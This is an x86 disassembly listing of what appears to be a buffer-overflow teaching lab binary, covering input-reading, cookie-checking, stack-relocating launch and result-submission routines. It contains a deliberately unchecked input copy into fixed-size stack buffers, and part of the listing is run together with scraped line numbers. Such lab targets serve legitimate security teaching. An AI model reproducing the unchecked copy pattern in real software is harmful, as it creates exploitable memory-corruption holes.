 8048c59:	0f b6 92 2c a2 04 08	movzbl 0x804a22c(%edx),%edx
 8048c60:	88 97 41 d1 04 08	mov %dl,0x804d141(%edi)
 8048c66:	c6 87 42 d1 04 08 20	movb $0x20,0x804d142(%edi)
 8048c6d:	83 c0 01	add $0x1,%eax
 8048c70:	a3 fc d0 04 08	mov %eax,0x804d0fc
 8048c75:	a1 0c d1 04 08	mov 0x804d10c,%eax
 8048c7a:	89 04 24	mov %eax,(%esp)
 8048c7d:	e8 4e fb ff ff	call 80487d0 <_IO_getc@plt>
 8048c82:	89 c2	mov %eax,%edx
 8048c84:	83 f8 ff	cmp $0xffffffff,%eax
 8048c87:	74 05	je 8048c8e
 8048c89:	83 f8 0a	cmp $0xa,%eax
 8048c8c:	75 9e	jne 8048c2c
 8048c8e:	c6 03 00	movb $0x0,(%ebx)
 8048c91:	a1 fc d0 04 08	mov 0x804d0fc,%eax
 8048c96:	c6 84 40 40 d1 04 08	movb $0x0,0x804d140(%eax,%eax,2)
 8048c9d:	00
 8048c9e:	89 f0	mov %esi,%eax
 8048ca0:	83 c4 1c	add $0x1c,%esp
 8048ca3:	5b	pop %ebx
 8048ca4:	5e	pop %esi
 8048ca5:	5f	pop %edi
 8048ca6:	5d	pop %ebp
 8048ca7:	c3	ret

08048ca8 :
 8048ca8:	55	push %ebp
 8048ca9:	89 e5	mov %esp,%ebp
 8048cab:	83 ec 18	sub $0x18,%esp
 8048cae:	e8 5d fb ff ff	call 8048810
 8048cb3:	89 04 24	mov %eax,(%esp)
 8048cb6:	e8 c5 fa ff ff	call 8048780
 8048cbb:	e8 70 fc ff ff	call 8048930
 8048cc0:	c9	leave
 8048cc1:	c3	ret

08048cc2 :
 8048cc2:	55	push %ebp
 8048cc3:	89 e5	mov %esp,%ebp
 8048cc5:	53	push %ebx
 8048cc6:	83 ec 24	sub $0x24,%esp
 8048cc9:	e8 da ff ff ff	call 8048ca8
 8048cce:	89 45 f4	mov %eax,-0xc(%ebp)
 8048cd1:	e8 c7 03 00 00	call 804909d
 8048cd6:	89 c3	mov %eax,%ebx
 8048cd8:	e8 cb ff ff ff	call 8048ca8
 8048cdd:	8b 55 f4	mov -0xc(%ebp),%edx
 8048ce0:	39 d0	cmp %edx,%eax
 8048ce2:	74 0e	je 8048cf2
 8048ce4:	c7 04 24 f4 9f 04 08	movl $0x8049ff4,(%esp)
 8048ceb:	e8 40 fb ff ff	call 8048830
 8048cf0:	eb 36	jmp 8048d28
 8048cf2:	3b 1d 08 d1 04 08	cmp 0x804d108,%ebx
 8048cf8:	75 1e	jne 8048d18
 8048cfa:	89 5c 24 04	mov %ebx,0x4(%esp)
 8048cfe:	c7 04 24 6e a1 04 08	movl $0x804a16e,(%esp)
 8048d05:	e8 86 fa ff ff	call 8048790
 8048d0a:	c7 04 24 03 00 00 00	movl $0x3,(%esp)
 8048d11:	e8 4c 04 00 00	call 8049162
 8048d16:	eb 10	jmp 8048d28
 8048d18:	89 5c 24 04	mov %ebx,0x4(%esp)
 8048d1c:	c7 04 24 8b a1 04 08	movl $0x804a18b,(%esp)
 8048d23:	e8 68 fa ff ff	call 8048790
 8048d28:	83 c4 24	add $0x24,%esp
 8048d2b:	5b	pop %ebx
 8048d2c:	5d	pop %ebp
 8048d2d:	c3	ret

08048d2e :
 8048d2e:	55	push %ebp
 8048d2f:	89 e5	mov %esp,%ebp
 8048d31:	53	push %ebx
 8048d32:	83 ec 24	sub $0x24,%esp
 8048d35:	e8 6e ff ff ff	call 8048ca8
 8048d3a:	89 45 f4	mov %eax,-0xc(%ebp)
 8048d3d:	e8 73 03 00 00	call 80490b5
 8048d42:	89 c3	mov %eax,%ebx
 8048d44:	e8 5f ff ff ff	call 8048ca8
 8048d49:	8b 55 f4	mov -0xc(%ebp),%edx
 8048d4c:	39 d0	cmp %edx,%eax
 8048d4e:	74 0e	je 8048d5e
 8048d50:	c7 04 24 f4 9f 04 08	movl $0x8049ff4,(%esp)
 8048d57:	e8 d4 fa ff ff	call 8048830
 8048d5c:	eb 36	jmp 8048d94
 8048d5e:	3b 1d 08 d1 04 08	cmp 0x804d108,%ebx
 8048d64:	75 1e	jne 8048d84
 8048d66:	89 5c 24 04	mov %ebx,0x4(%esp)
 8048d6a:	c7 04 24 20 a0 04 08	movl $0x804a020,(%esp)
 8048d71:	e8 1a fa ff ff	call 8048790
 8048d76:	c7 04 24 04 00 00 00	movl $0x4,(%esp)
 8048d7d:	e8 e0 03 00 00	call 8049162
 8048d82:	eb 10	jmp 8048d94
 8048d84:	89 5c 24 04	mov %ebx,0x4(%esp)
 8048d88:	c7 04 24 a6 a1 04 08	movl $0x804a1a6,(%esp)
 8048d8f:	e8 fc f9 ff ff	call 8048790
 8048d94:	83 c4 24	add $0x24,%esp
 8048d97:	5b	pop %ebx
 8048d98:	5d	pop %ebp
 8048d99:	c3	ret

08048d9a :
 8048d9a:	55	push %ebp
 8048d9b:	89 e5	mov %esp,%ebp
 8048d9d:	53	push %ebx
 8048d9e:	83 ec 54	sub $0x54,%esp
 8048da1:	89 c3	mov %eax,%ebx
 8048da3:	8d 4d b8	lea -0x48(%ebp),%ecx
 8048da6:	81 e1 f0 3f 00 00	and $0x3ff0,%ecx
 8048dac:	8d 44 11 1e	lea 0x1e(%ecx,%edx,1),%eax
 8048db0:	83 e0 f0	and $0xfffffff0,%eax
 8048db3:	29 c4	sub %eax,%esp
 8048db5:	8d 44 24 1b	lea 0x1b(%esp),%eax
 8048db9:	83 e0 f0	and $0xfffffff0,%eax
 8048dbc:	89 4c 24 08	mov %ecx,0x8(%esp)
 8048dc0:	c7 44 24 04 f4 00 00	movl $0xf4,0x4(%esp)
 8048dc7:	00
 8048dc8:	89 04 24	mov %eax,(%esp)
 8048dcb:	e8 f0 fa ff ff	call 80488c0
 8048dd0:	c7 04 24 c2 a1 04 08	movl $0x804a1c2,(%esp)
 8048dd7:	e8 b4 f9 ff ff	call 8048790
 8048ddc:	85 db	test %ebx,%ebx
 8048dde:	74 07	je 8048de7
 8048de0:	e8 49 ff ff ff	call 8048d2e
 8048de5:	eb 05	jmp 8048dec
 8048de7:	e8 d6 fe ff ff	call 8048cc2
 8048dec:	83 3d 04 d1 04 08 00	cmpl
$0x0,0x804d104 551 | 8048df3: 75 16 jne 8048e0b 552 | 8048df5: c7 04 24 b4 a0 04 08 movl $0x804a0b4,(%esp) 553 | 8048dfc: e8 2f fa ff ff call 8048830 554 | 8048e01: c7 05 04 d1 04 08 00 movl $0x0,0x804d104 555 | 8048e08: 00 00 00 556 | 8048e0b: 8b 5d fc mov -0x4(%ebp),%ebx 557 | 8048e0e: c9 leave 558 | 8048e0f: c3 ret 559 | 560 | 08048e10 : 561 | 8048e10: 55 push %ebp 562 | 8048e11: 89 e5 mov %esp,%ebp 563 | 8048e13: 83 ec 28 sub $0x28,%esp 564 | 8048e16: 8b 45 08 mov 0x8(%ebp),%eax 565 | 8048e19: a3 f8 d0 04 08 mov %eax,0x804d0f8 566 | 8048e1e: 8b 45 0c mov 0xc(%ebp),%eax 567 | 8048e21: a3 f4 d0 04 08 mov %eax,0x804d0f4 568 | 8048e26: c7 44 24 14 00 00 00 movl $0x0,0x14(%esp) 569 | 8048e2d: 00 570 | 8048e2e: c7 44 24 10 00 00 00 movl $0x0,0x10(%esp) 571 | 8048e35: 00 572 | 8048e36: c7 44 24 0c 32 01 00 movl $0x132,0xc(%esp) 573 | 8048e3d: 00 574 | 8048e3e: c7 44 24 08 07 00 00 movl $0x7,0x8(%esp) 575 | 8048e45: 00 576 | 8048e46: c7 44 24 04 00 00 10 movl $0x100000,0x4(%esp) 577 | 8048e4d: 00 578 | 8048e4e: c7 04 24 00 60 58 55 movl $0x55586000,(%esp) 579 | 8048e55: e8 16 fa ff ff call 8048870 580 | 8048e5a: 3d 00 60 58 55 cmp $0x55586000,%eax 581 | 8048e5f: 74 31 je 8048e92 582 | 8048e61: a1 e0 d0 04 08 mov 0x804d0e0,%eax 583 | 8048e66: 89 44 24 0c mov %eax,0xc(%esp) 584 | 8048e6a: c7 44 24 08 47 00 00 movl $0x47,0x8(%esp) 585 | 8048e71: 00 586 | 8048e72: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp) 587 | 8048e79: 00 588 | 8048e7a: c7 04 24 40 a0 04 08 movl $0x804a040,(%esp) 589 | 8048e81: e8 5a f9 ff ff call 80487e0 590 | 8048e86: c7 04 24 01 00 00 00 movl $0x1,(%esp) 591 | 8048e8d: e8 be f9 ff ff call 8048850 592 | 8048e92: c7 05 20 d1 04 08 f8 movl $0x55685ff8,0x804d120 593 | 8048e99: 5f 68 55 594 | 8048e9c: ba f8 5f 68 55 mov $0x55685ff8,%edx 595 | 8048ea1: 89 e0 mov %esp,%eax 596 | 8048ea3: 89 d4 mov %edx,%esp 597 | 8048ea5: 89 c2 mov %eax,%edx 598 | 8048ea7: 89 15 f0 d0 04 08 mov %edx,0x804d0f0 599 | 8048ead: 8b 15 f4 d0 04 08 mov 0x804d0f4,%edx 600 | 8048eb3: 
a1 f8 d0 04 08 mov 0x804d0f8,%eax 601 | 8048eb8: e8 dd fe ff ff call 8048d9a 602 | 8048ebd: a1 f0 d0 04 08 mov 0x804d0f0,%eax 603 | 8048ec2: 89 c4 mov %eax,%esp 604 | 8048ec4: c7 44 24 04 00 00 10 movl $0x100000,0x4(%esp) 605 | 8048ecb: 00 606 | 8048ecc: c7 04 24 00 60 58 55 movl $0x55586000,(%esp) 607 | 8048ed3: e8 28 fa ff ff call 8048900 608 | 8048ed8: c9 leave 609 | 8048ed9: c3 ret 610 | 611 | 08048eda
: 612 | 8048eda: 55 push %ebp 613 | 8048edb: 89 e5 mov %esp,%ebp 614 | 8048edd: 57 push %edi 615 | 8048ede: 56 push %esi 616 | 8048edf: 53 push %ebx 617 | 8048ee0: 83 e4 f0 and $0xfffffff0,%esp 618 | 8048ee3: 83 ec 20 sub $0x20,%esp 619 | 8048ee6: 8b 75 08 mov 0x8(%ebp),%esi 620 | 8048ee9: 8b 5d 0c mov 0xc(%ebp),%ebx 621 | 8048eec: c7 44 24 04 aa 8a 04 movl $0x8048aaa,0x4(%esp) 622 | 8048ef3: 08 623 | 8048ef4: c7 04 24 0b 00 00 00 movl $0xb,(%esp) 624 | 8048efb: e8 b0 f8 ff ff call 80487b0 625 | 8048f00: c7 44 24 04 80 8a 04 movl $0x8048a80,0x4(%esp) 626 | 8048f07: 08 627 | 8048f08: c7 04 24 07 00 00 00 movl $0x7,(%esp) 628 | 8048f0f: e8 9c f8 ff ff call 80487b0 629 | 8048f14: c7 44 24 04 d4 8a 04 movl $0x8048ad4,0x4(%esp) 630 | 8048f1b: 08 631 | 8048f1c: c7 04 24 04 00 00 00 movl $0x4,(%esp) 632 | 8048f23: e8 88 f8 ff ff call 80487b0 633 | 8048f28: a1 e4 d0 04 08 mov 0x804d0e4,%eax 634 | 8048f2d: a3 0c d1 04 08 mov %eax,0x804d10c 635 | 8048f32: bf 01 00 00 00 mov $0x1,%edi 636 | 8048f37: c7 44 24 1c 00 00 00 movl $0x0,0x1c(%esp) 637 | 8048f3e: 00 638 | 8048f3f: eb 67 jmp 8048fa8 639 | 8048f41: 83 e8 67 sub $0x67,%eax 640 | 8048f44: 3c 0e cmp $0xe,%al 641 | 8048f46: 77 59 ja 8048fa1 642 | 8048f48: 0f b6 c0 movzbl %al,%eax 643 | 8048f4b: ff 24 85 f0 a1 04 08 jmp *0x804a1f0(,%eax,4) 644 | 8048f52: c7 44 24 1c 01 00 00 movl $0x1,0x1c(%esp) 645 | 8048f59: 00 646 | 8048f5a: bf 05 00 00 00 mov $0x5,%edi 647 | 8048f5f: eb 47 jmp 8048fa8 648 | 8048f61: 8b 03 mov (%ebx),%eax 649 | 8048f63: e8 96 fb ff ff call 8048afe 650 | 8048f68: a1 e8 d0 04 08 mov 0x804d0e8,%eax 651 | 8048f6d: 89 04 24 mov %eax,(%esp) 652 | 8048f70: e8 5b f9 ff ff call 80488d0 <__strdup@plt> 653 | 8048f75: a3 18 d1 04 08 mov %eax,0x804d118 654 | 8048f7a: 89 04 24 mov %eax,(%esp) 655 | 8048f7d: e8 7c 0e 00 00 call 8049dfe 656 | 8048f82: a3 08 d1 04 08 mov %eax,0x804d108 657 | 8048f87: eb 1f jmp 8048fa8 658 | 8048f89: c7 05 14 d1 04 08 01 movl $0x1,0x804d114 659 | 8048f90: 00 00 00 660 | 8048f93: eb 13 jmp 
8048fa8 661 | 8048f95: c7 05 10 d1 04 08 01 movl $0x1,0x804d110 662 | 8048f9c: 00 00 00 663 | 8048f9f: eb 07 jmp 8048fa8 664 | 8048fa1: 8b 03 mov (%ebx),%eax 665 | 8048fa3: e8 56 fb ff ff call 8048afe 666 | 8048fa8: c7 44 24 08 cf a1 04 movl $0x804a1cf,0x8(%esp) 667 | 8048faf: 08 668 | 8048fb0: 89 5c 24 04 mov %ebx,0x4(%esp) 669 | 8048fb4: 89 34 24 mov %esi,(%esp) 670 | 8048fb7: e8 e4 f8 ff ff call 80488a0 671 | 8048fbc: 3c ff cmp $0xff,%al 672 | 8048fbe: 75 81 jne 8048f41 673 | 8048fc0: 83 3d 18 d1 04 08 00 cmpl $0x0,0x804d118 674 | 8048fc7: 75 19 jne 8048fe2 675 | 8048fc9: 8b 03 mov (%ebx),%eax 676 | 8048fcb: 89 44 24 04 mov %eax,0x4(%esp) 677 | 8048fcf: c7 04 24 88 a0 04 08 movl $0x804a088,(%esp) 678 | 8048fd6: e8 b5 f7 ff ff call 8048790 679 | 8048fdb: 8b 03 mov (%ebx),%eax 680 | 8048fdd: e8 1c fb ff ff call 8048afe 681 | 8048fe2: e8 ec 00 00 00 call 80490d3 682 | 8048fe7: a1 18 d1 04 08 mov 0x804d118,%eax 683 | 8048fec: 89 44 24 04 mov %eax,0x4(%esp) 684 | 8048ff0: c7 04 24 d6 a1 04 08 movl $0x804a1d6,(%esp) 685 | 8048ff7: e8 94 f7 ff ff call 8048790 686 | 8048ffc: a1 08 d1 04 08 mov 0x804d108,%eax 687 | 8049001: 89 44 24 04 mov %eax,0x4(%esp) 688 | 8049005: c7 04 24 e2 a1 04 08 movl $0x804a1e2,(%esp) 689 | 804900c: e8 7f f7 ff ff call 8048790 690 | 8049011: a1 08 d1 04 08 mov 0x804d108,%eax 691 | 8049016: 89 04 24 mov %eax,(%esp) 692 | 8049019: e8 62 f7 ff ff call 8048780 693 | 804901e: e8 0d f9 ff ff call 8048930 694 | 8049023: 25 f0 0f 00 00 and $0xff0,%eax 695 | 8049028: 05 00 01 00 00 add $0x100,%eax 696 | 804902d: 89 44 24 18 mov %eax,0x18(%esp) 697 | 8049031: c7 44 24 04 04 00 00 movl $0x4,0x4(%esp) 698 | 8049038: 00 699 | 8049039: 89 3c 24 mov %edi,(%esp) 700 | 804903c: e8 2f f9 ff ff call 8048970 701 | 8049041: 89 c6 mov %eax,%esi 702 | 8049043: c7 00 00 00 00 00 movl $0x0,(%eax) 703 | 8049049: bb 01 00 00 00 mov $0x1,%ebx 704 | 804904e: eb 17 jmp 8049067 705 | 8049050: e8 db f8 ff ff call 8048930 706 | 8049055: 25 f0 00 00 00 and $0xf0,%eax 707 | 
804905a: ba 80 00 00 00 mov $0x80,%edx
804905f: 29 c2 sub %eax,%edx
8049061: 89 14 9e mov %edx,(%esi,%ebx,4)
8049064: 83 c3 01 add $0x1,%ebx
8049067: 39 fb cmp %edi,%ebx
8049069: 7c e5 jl 8049050
804906b: bb 00 00 00 00 mov $0x0,%ebx
8049070: eb 1a jmp 804908c
8049072: 8b 44 24 18 mov 0x18(%esp),%eax
8049076: 03 04 9e add (%esi,%ebx,4),%eax
8049079: 89 44 24 04 mov %eax,0x4(%esp)
804907d: 8b 44 24 1c mov 0x1c(%esp),%eax
8049081: 89 04 24 mov %eax,(%esp)
8049084: e8 87 fd ff ff call 8048e10
8049089: 83 c3 01 add $0x1,%ebx
804908c: 39 fb cmp %edi,%ebx
804908e: 7c e2 jl 8049072
8049090: b8 00 00 00 00 mov $0x0,%eax
8049095: 8d 65 f4 lea -0xc(%ebp),%esp
8049098: 5b pop %ebx
8049099: 5e pop %esi
804909a: 5f pop %edi
804909b: 5d pop %ebp
804909c: c3 ret

0804909d :
804909d: 55 push %ebp
804909e: 89 e5 mov %esp,%ebp
80490a0: 83 ec 38 sub $0x38,%esp
80490a3: 8d 45 d8 lea -0x28(%ebp),%eax
80490a6: 89 04 24 mov %eax,(%esp)
80490a9: e8 64 fb ff ff call 8048c12
80490ae: b8 01 00 00 00 mov $0x1,%eax
80490b3: c9 leave
80490b4: c3 ret

080490b5 :
80490b5: 55 push %ebp
80490b6: 89 e5 mov %esp,%ebp
80490b8: 81 ec 18 02 00 00 sub $0x218,%esp
80490be: 8d 85 f8 fd ff ff lea -0x208(%ebp),%eax
80490c4: 89 04 24 mov %eax,(%esp)
80490c7: e8 46 fb ff ff call 8048c12
80490cc: b8 01 00 00 00 mov $0x1,%eax
80490d1: c9 leave
80490d2: c3 ret

080490d3 :
80490d3: 55 push %ebp
80490d4: 89 e5 mov %esp,%ebp
80490d6: 81 ec 18 24 00 00 sub $0x2418,%esp
80490dc: 83 3d 10 d1 04 08 00 cmpl $0x0,0x804d110
80490e3: 74 0c je 80490f1
80490e5: c7 04 24 ff ff ff ff movl $0xffffffff,(%esp)
80490ec: e8 3c 0a 00 00 call 8049b2d
80490f1: 83 3d 14 d1 04 08 00 cmpl $0x0,0x804d114
80490f8: 74 66 je 8049160
80490fa: c7 44 24 04 00 04 00 movl $0x400,0x4(%esp)
8049101: 00
8049102: 8d 85 f8 fb ff ff lea -0x408(%ebp),%eax
8049108: 89 04 24 mov %eax,(%esp)
804910b: e8 10 f7 ff ff call 8048820
8049110: 85 c0 test %eax,%eax
8049112: 74 18 je 804912c
8049114: c7 04 24 3c a2 04 08 movl $0x804a23c,(%esp)
804911b: e8 10 f7 ff ff call 8048830
8049120: c7 04 24 08 00 00 00 movl $0x8,(%esp)
8049127: e8 24 f7 ff ff call 8048850
804912c: 8d 85 f8 db ff ff lea -0x2408(%ebp),%eax
8049132: 89 04 24 mov %eax,(%esp)
8049135: e8 2d 0a 00 00 call 8049b67
804913a: 85 c0 test %eax,%eax
804913c: 79 22 jns 8049160
804913e: 8d 85 f8 db ff ff lea -0x2408(%ebp),%eax
8049144: 89 44 24 04 mov %eax,0x4(%esp)
8049148: c7 04 24 6e a3 04 08 movl $0x804a36e,(%esp)
804914f: e8 3c f6 ff ff call 8048790
8049154: c7 04 24 08 00 00 00 movl $0x8,(%esp)
804915b: e8 f0 f6 ff ff call 8048850
8049160: c9 leave
8049161: c3 ret

08049162 :
8049162: 55 push %ebp
8049163: 89 e5 mov %esp,%ebp
8049165: 57 push %edi
8049166: 53 push %ebx
8049167: 81 ec 20 40 00 00 sub $0x4020,%esp
804916d: 8b 5d 08 mov 0x8(%ebp),%ebx
8049170: 83 3d 18 d1 04 08 00 cmpl $0x0,0x804d118
8049177: 75 11 jne 804918a
8049179: c7 04 24 74 a2 04 08 movl $0x804a274,(%esp)
8049180: e8 ab f6 ff ff call 8048830
8049185: e9 14 01 00 00 jmp 804929e
804918a: 83 fb 04 cmp $0x4,%ebx
804918d: 76 11 jbe 80491a0
804918f: c7 04 24 a0 a2 04 08 movl $0x804a2a0,(%esp)
8049196: e8 95 f6 ff ff call 8048830
804919b: e9 fe 00 00 00 jmp 804929e
80491a0: c7 05 04 d1 04 08 01 movl $0x1,0x804d104
80491a7: 00 00 00
80491aa: 8b 04 9d c0 c0 04 08 mov 0x804c0c0(,%ebx,4),%eax
80491b1: 83 e8 01 sub $0x1,%eax
80491b4: 89 04 9d c0 c0 04 08 mov %eax,0x804c0c0(,%ebx,4)
80491bb: 85 c0 test %eax,%eax
80491bd: 7e 11 jle 80491d0
80491bf: c7 04 24 83 a3 04 08 movl $0x804a383,(%esp)
80491c6: e8 65 f6 ff ff call 8048830
80491cb: e9 ce 00 00 00 jmp 804929e
80491d0: c7 04 24 8e a3 04 08 movl $0x804a38e,(%esp)
80491d7: e8 54 f6 ff ff call 8048830
80491dc: 83 3d 14 d1 04 08 00 cmpl $0x0,0x804d114
80491e3: 0f 84 a9 00 00 00 je 8049292
80491e9: bf 40 d1 04 08 mov $0x804d140,%edi
80491ee: b8 00 00 00 00 mov $0x0,%eax
80491f3: b9 ff ff ff ff mov $0xffffffff,%ecx
80491f8: f2 ae repnz scas %es:(%edi),%al
80491fa: 89 ca mov %ecx,%edx
80491fc: f7 d2 not %edx
80491fe: 89 d1 mov %edx,%ecx
8049200: 83 c1 1f add $0x1f,%ecx
8049203: 81 f9 00 20 00 00 cmp $0x2000,%ecx
8049209: 76 11 jbe 804921c
804920b: c7 04 24 c8 a2 04 08 movl $0x804a2c8,(%esp)
8049212: e8 19 f6 ff ff call 8048830
8049217: e9 82 00 00 00 jmp 804929e
804921c: c7 44 24 10 40 d1 04 movl $0x804d140,0x10(%esp)
8049223: 08
8049224: a1 08 d1 04 08 mov 0x804d108,%eax
8049229: 89 44 24 0c mov %eax,0xc(%esp)
804922d: 89 5c 24 08 mov %ebx,0x8(%esp)
8049231: c7 44 24 04 94 a3 04 movl $0x804a394,0x4(%esp)
8049238: 08
8049239: 8d 9d f8 df ff ff lea -0x2008(%ebp),%ebx
804923f: 89 1c 24 mov %ebx,(%esp)
8049242: e8 c9 f6 ff ff call 8048910
8049247: 8d 85 f8 bf ff ff lea -0x4008(%ebp),%eax
804924d: 89 44 24 0c mov %eax,0xc(%esp)
8049251: c7 44 24 08 00 00 00 movl $0x0,0x8(%esp)
8049258: 00
8049259: 89 5c 24 04 mov %ebx,0x4(%esp)
804925d: a1 18 d1 04 08 mov 0x804d118,%eax
8049262: 89 04 24 mov %eax,(%esp)
8049265: e8 9a 0a 00 00 call 8049d04
804926a: 85 c0 test %eax,%eax
804926c: 75 0e jne 804927c
804926e: c7 04 24 00 a3 04 08 movl $0x804a300,(%esp)
8049275: e8 b6 f5 ff ff call 8048830
804927a: eb 16 jmp 8049292
804927c: 8d 85 f8 bf ff ff lea -0x4008(%ebp),%eax
8049282: 89 44 24 04 mov %eax,0x4(%esp)
8049286: c7 04 24 30 a3 04 08 movl $0x804a330,(%esp)
804928d: e8 fe f4 ff ff call 8048790
8049292: c7 04 24 9d a3 04 08 movl $0x804a39d,(%esp)
8049299: e8 92 f5 ff ff call 8048830
804929e: 81 c4 20 40 00 00 add $0x4020,%esp
80492a4: 5b pop %ebx
80492a5: 5f pop %edi
80492a6: 5d pop %ebp
80492a7: c3 ret
80492a8: 66 90 xchg %ax,%ax
80492aa: 66 90 xchg %ax,%ax
80492ac: 66 90 xchg %ax,%ax
80492ae: 66 90 xchg %ax,%ax

080492b0 :
80492b0: 55 push %ebp
80492b1: 89 e5 mov %esp,%ebp
80492b3: 83 ec 18 sub $0x18,%esp
80492b6: c7 44 24 04 02 00 00 movl $0x2,0x4(%esp)
80492bd: 00
80492be: c7 04 24 b4 a3 04 08 movl $0x804a3b4,(%esp)
80492c5: e8 c6 f4 ff ff call 8048790
80492ca: c7 04 24 01 00 00 00 movl $0x1,(%esp)
80492d1: e8 7a f5 ff ff call 8048850

080492d6 :
80492d6: 55 push %ebp
80492d7: 89 e5 mov %esp,%ebp
80492d9: 57 push %edi
80492da: 56 push %esi
80492db: 53 push %ebx
80492dc: 83 ec 3c sub $0x3c,%esp
80492df: 89 55 d0 mov %edx,-0x30(%ebp)
80492e2: 83 f9 01 cmp $0x1,%ecx
80492e5: 0f 86 c1 00 00 00 jbe 80493ac
80492eb: 89 c3 mov %eax,%ebx
80492ed: 89 4d c4 mov %ecx,-0x3c(%ebp)
80492f0: c7 45 d4 01 00 00 00 movl $0x1,-0x2c(%ebp)
80492f7: 8d 78 0c lea 0xc(%eax),%edi
80492fa: eb 39 jmp 8049335
80492fc: c7 44 24 08 00 20 00 movl $0x2000,0x8(%esp)
8049303: 00
8049304: 89 7c 24 04 mov %edi,0x4(%esp)
8049308: 8b 03 mov (%ebx),%eax
804930a: 89 04 24 mov %eax,(%esp)
804930d: e8 5e f4 ff ff call 8048770
8049312: 89 43 04 mov %eax,0x4(%ebx)
8049315: 85 c0 test %eax,%eax
8049317: 79 0f jns 8049328
8049319: e8 c2 f5 ff ff call 80488e0 <__errno_location@plt>
804931e: 83 38 04 cmpl $0x4,(%eax)
8049321: 74 12 je 8049335
8049323: e9 96 00 00 00 jmp 80493be
8049328: 85 c0 test %eax,%eax
804932a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
8049330: 74 62 je 8049394
8049332: 89 7b 08 mov %edi,0x8(%ebx)
8049335: 8b 73 04 mov 0x4(%ebx),%esi
8049338: 85 f6 test %esi,%esi
804933a: 7e c0 jle 80492fc
804933c: 85 f6 test %esi,%esi
804933e: 0f 95 c0 setne %al
8049341: 0f b6 c0 movzbl %al,%eax
8049344: 89 45 cc mov %eax,-0x34(%ebp)
8049347: 8b 4b 08 mov 0x8(%ebx),%ecx
804934a: 89 44 24 08 mov %eax,0x8(%esp)
804934e: 89 4d c8 mov %ecx,-0x38(%ebp)
8049351: 89 4c 24 04 mov %ecx,0x4(%esp)
8049355: 8d 55 e7 lea -0x19(%ebp),%edx
8049358: 89 14 24 mov %edx,(%esp)
804935b: e8 40 f4 ff ff call 80487a0
8049360: 8b 4d c8 mov -0x38(%ebp),%ecx
8049363: 8b 55 cc mov -0x34(%ebp),%edx
8049366: 01 d1 add %edx,%ecx
8049368: 89 4b 08 mov %ecx,0x8(%ebx)
804936b: 29 d6 sub %edx,%esi
804936d: 89 73 04 mov %esi,0x4(%ebx)
8049370: 83 fa 01 cmp $0x1,%edx
8049373: 75 14 jne 8049389
8049375: 83 45 d0 01 addl $0x1,-0x30(%ebp)
8049379: 0f b6 45 e7 movzbl -0x19(%ebp),%eax
804937d: 8b 55 d0 mov -0x30(%ebp),%edx
8049380: 88 42 ff mov %al,-0x1(%edx)
8049383: 3c 0a cmp $0xa,%al
8049385: 75 17 jne 804939e
8049387: eb 2a jmp 80493b3
8049389: 83 7d cc 00 cmpl $0x0,-0x34(%ebp)
804938d: 75 36 jne 80493c5
804938f: 8b 45 d4 mov -0x2c(%ebp),%eax
8049392: eb 03 jmp 8049397
8049394: 8b 45 d4 mov -0x2c(%ebp),%eax
8049397: 83 f8 01 cmp $0x1,%eax
804939a: 75 17 jne 80493b3
804939c: eb 2e jmp 80493cc
804939e: 83 45 d4 01 addl $0x1,-0x2c(%ebp)
80493a2: 8b 45 c4 mov -0x3c(%ebp),%eax
80493a5: 39 45 d4 cmp %eax,-0x2c(%ebp)
80493a8: 74 09 je 80493b3
80493aa: eb 89 jmp 8049335
80493ac: c7 45 d4 01 00 00 00 movl $0x1,-0x2c(%ebp)
80493b3: 8b 45 d0 mov -0x30(%ebp),%eax
80493b6: c6 00 00 movb $0x0,(%eax)
80493b9: 8b 45 d4 mov -0x2c(%ebp),%eax
80493bc: eb 13 jmp 80493d1
80493be: b8 ff ff ff ff mov $0xffffffff,%eax
80493c3: eb 0c jmp 80493d1
80493c5: b8 ff ff ff ff mov $0xffffffff,%eax
80493ca: eb 05 jmp 80493d1
80493cc: b8 00 00 00 00 mov $0x0,%eax
80493d1: 83 c4 3c add $0x3c,%esp
80493d4: 5b pop %ebx
80493d5: 5e pop %esi
80493d6: 5f pop %edi
80493d7: 5d pop %ebp
80493d8: c3 ret

080493d9 :
80493d9: 55 push %ebp
80493da: 89 e5 mov %esp,%ebp
80493dc: 57 push %edi
80493dd: 56 push %esi
80493de: 53 push %ebx
80493df: 81 ec 6c a0 00 00 sub $0xa06c,%esp
80493e5: 8b 7d 08 mov 0x8(%ebp),%edi
80493e8: 8b 5d 1c mov 0x1c(%ebp),%ebx
80493eb: c7 85 c8 7f ff ff 00 movl $0x0,-0x8038(%ebp)
80493f2: 00 00 00
80493f5: c7 44 24 08 00 00 00 movl $0x0,0x8(%esp)
80493fc: 00
80493fd: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp)
8049404: 00
8049405: c7 04 24 02 00 00 00 movl $0x2,(%esp)
804940c: e8 0f f5 ff ff call 8048920
8049411: 89 85 b4 5f ff ff mov %eax,-0xa04c(%ebp)
8049417: 85 c0 test %eax,%eax
8049419: 79 51 jns 804946c
804941b: 8b 45 20 mov 0x20(%ebp),%eax
804941e: c7 00 45 72 72 6f movl $0x6f727245,(%eax)
8049424: c7 40 04 72 3a 20 43 movl $0x43203a72,0x4(%eax)
804942b: c7 40 08 6c 69 65 6e movl $0x6e65696c,0x8(%eax)
8049432: c7 40 0c 74 20 75 6e movl $0x6e752074,0xc(%eax)
8049439: c7 40 10 61 62 6c 65 movl $0x656c6261,0x10(%eax)
8049440: c7 40 14 20 74 6f 20 movl $0x206f7420,0x14(%eax)
8049447: c7 40 18 63 72 65 61 movl $0x61657263,0x18(%eax)
804944e: c7 40 1c 74 65 20 73 movl $0x73206574,0x1c(%eax)
8049455: c7 40 20 6f 63 6b 65 movl $0x656b636f,0x20(%eax)
804945c: 66 c7 40 24 74 00 movw $0x74,0x24(%eax)
8049462: b8 ff ff ff ff mov $0xffffffff,%eax
8049467: e9 b6 06 00 00 jmp 8049b22
804946c: 89 3c 24 mov %edi,(%esp)
804946f: e8 cc f4 ff ff call 8048940
8049474: 85 c0 test %eax,%eax
8049476: 75 2f jne 80494a7
8049478: 89 7c 24 08 mov %edi,0x8(%esp)
804947c: c7 44 24 04 d8 a3 04 movl $0x804a3d8,0x4(%esp)
8049483: 08
8049484: 8b 45 20 mov 0x20(%ebp),%eax
8049487: 89 04 24 mov %eax,(%esp)
804948a: e8 81 f4 ff ff call 8048910
804948f: 8b 85 b4 5f ff ff mov -0xa04c(%ebp),%eax
8049495: 89 04 24 mov %eax,(%esp)
